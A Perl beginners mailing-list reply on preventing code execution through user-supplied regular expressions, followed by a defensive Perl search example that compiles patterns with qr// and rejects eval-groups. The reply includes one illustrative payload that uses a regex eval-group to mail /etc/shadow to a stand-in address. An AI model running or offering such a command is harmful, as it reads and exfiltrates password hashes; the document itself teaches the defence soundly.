On Wed, Jun 01, 2011 at 11:25:39PM +0200, Stanisław Findeisen wrote:
> Suppose you have a collection of books, and want to provide your users
> with the ability to search the book title, author or content using
> regular expressions.
> 
> But you don't want to let them execute any code.
> 
> How would you validate/compile/evaluate the user provided regex so as to
> provide maximum flexibility and prevent code execution?

In general this shouldn't be a problem provided you don't turn on

  use re "eval";

  $ perl -e '/$ARGV[0]/' '(?{ print "hello" })'
  Eval-group not allowed at runtime, use re 'eval' in regex m/(?{ print
  "hello" })/ at -e line 1.

  $ perl -Mre=eval -e '/$ARGV[0]/' '(?{ print "hello" })'
  hello

Of course, you're not going to be too worried about people saying hello,
but once you can execute arbitrary code all bets are off:

  $ perl -e '/$ARGV[0]/' '(?{ system "sudo mailx -s ha baddie\@example.com < /etc/shadow" })'

Make sure you don't do the whole match as part of a string eval, and
since you're only matching, you shouldn't have to worry about s///e.

If you prefer a more paranoid approach you might want to restrict the
characters you allow in the user input, but this doesn't provide maximum
flexibility.

-- 
Paul Johnson - p...@pjcj.net
http://www.pjcj.net
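To make the advice in the reply concrete, here is an added example (my own code, not Paul Johnson's and not from the list) of a small book search that takes a user-supplied pattern. It relies on exactly the behaviour shown above: with `use re 'eval'` left off, a pattern interpolated at runtime that contains an eval-group is refused by the regex compiler, so the search only has to catch that compile error rather than try to parse the pattern itself. The book records, the field names and the function names (`compile_user_regex`, `match_with_timeout`, `search_books`) are all constructed for this illustration. The alarm-based timeout is an extra guard of my own against patterns that backtrack for a very long time; it is not something the reply suggests.

```perl
#!/usr/bin/perl
use strict;
use warnings;
# Deliberately NO `use re 'eval';` anywhere in this file.

# Constructed sample catalogue (not real data).
my @books = (
    { title => 'Programming Perl',
      author => 'Larry Wall',
      content => 'Perl is a language for getting your job done.' },
    { title => 'Learning Perl',
      author => 'Randal Schwartz',
      content => 'Hello, World!' },
    { title => 'Mastering Regular Expressions',
      author => 'Jeffrey Friedl',
      content => 'Regexes are powerful.' },
);

# Compile a user-supplied pattern with qr// (never with a string eval).
# Because the pattern is interpolated at runtime and `use re 'eval'` is
# not in effect, (?{ ... }) and (??{ ... }) make qr// die with
# "Eval-group not allowed at runtime". We trap that, and any ordinary
# syntax error, with a block eval and hand back an error string instead.
sub compile_user_regex {
    my ($pattern) = @_;
    my $re = eval { qr/$pattern/ };
    if ($@) {
        (my $err = $@) =~ s/\s+\z//;   # drop the trailing newline perl adds
        return (undef, $err);
    }
    return ($re, undef);
}

# Match one string under a wall-clock limit. This is best effort: with
# perl's default "safe signals" the handler runs between ops, so a single
# very long match may not be interrupted promptly. Combine it with a cap
# on pattern length rather than relying on it alone.
sub match_with_timeout {
    my ($re, $text, $seconds) = @_;
    my $matched;
    eval {
        local $SIG{ALRM} = sub { die "timeout\n" };
        alarm $seconds;
        $matched = ($text =~ $re) ? 1 : 0;
        alarm 0;
    };
    alarm 0;
    return (undef, 'timeout') if $@ && $@ eq "timeout\n";
    die $@ if $@;
    return ($matched, undef);
}

# Search one field (title/author/content) of every book.
# Returns (arrayref of matching titles, undef) or (undef, error string).
sub search_books {
    my ($field, $pattern, $timeout) = @_;
    $timeout = 2 unless defined $timeout;
    return (undef, 'pattern too long') if length($pattern) > 200;

    my ($re, $err) = compile_user_regex($pattern);
    return (undef, "rejected pattern: $err") unless $re;

    my @hits;
    for my $book (@books) {
        my ($ok, $merr) = match_with_timeout($re, $book->{$field}, $timeout);
        return (undef, "pattern timed out on '$book->{title}'") if $merr;
        push @hits, $book->{title} if $ok;
    }
    return (\@hits, undef);
}

# Constructed demo: two ordinary searches, an eval-group that is refused
# at compile time, and a plain syntax error.
for my $case ([title   => '(?i)^learning'],
              [author  => 'Wall|Friedl'],
              [content => '(?{ print "hello" })'],
              [title   => '(unclosed']) {
    my ($field, $pattern) = @$case;
    my ($hits, $err) = search_books($field, $pattern);
    if ($err) {
        print "$field =~ /$pattern/: $err\n";
    } else {
        print "$field =~ /$pattern/: ", join(', ', @$hits), "\n";
    }
}
```

Running this prints the two title lists for the first two patterns, then a `rejected pattern: Eval-group not allowed at runtime, use re 'eval' in regex m/.../` line for the third and an `Unmatched ( in regex` rejection for the fourth; in no case is the `print "hello"` executed. The important design point is that `compile_user_regex` only ever passes the pattern through `qr//`, so the regex compiler does the refusing, and the search code never builds a string that gets handed to `eval STRING`.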

--
To unsubscribe, e-mail: beginners-unsubscr...@perl.org
For additional commands, e-mail: beginners-h...@perl.org
http://learn.perl.org/